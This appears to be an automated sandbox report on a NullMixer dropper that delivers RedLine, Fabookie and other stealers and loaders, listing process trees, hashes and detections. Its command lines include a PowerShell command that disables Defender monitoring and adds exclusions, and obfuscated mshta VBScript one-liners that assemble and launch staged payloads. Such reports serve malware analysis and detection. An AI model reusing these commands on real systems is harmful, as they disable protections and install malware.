PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1696 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

Processes

C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp" /SL5="$401EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4908 -ip 4908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3712 -ip 3712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 356

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7002E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

Network


Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 bc10ee7cbbf3ea8b505c94bd655f5e50
SHA1 4667e7d52e54ba83ee7c264c14171a4db0d1c444
SHA256 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111
SHA512 a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhtdin5l.1lz.ps1

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp

C:\Users\Admin\AppData\Local\Temp\is-JIEQ4.tmp\idp.dll

C:\Users\Admin\AppData\Local\Temp\is-T84SO.tmp\_isetup\_shfoldr.dll

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log

C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM

C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS

C:\Users\Admin\AppData\Local\Temp\nytFSko.4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n

C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1

C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT

C:\Users\Admin\AppData\Local\Temp\SVnzW.C2

C:\Users\Admin\AppData\Local\Temp\OJM3YR.x

Analysis: behavioral5

Detonation Overview

Submitted: 2024-11-10 17:24

Reported: 2024-11-10 17:27

Platform: win7-20240708-en

Max time kernel: 150s

Max time network: 152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 344 set thread context of 2780 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
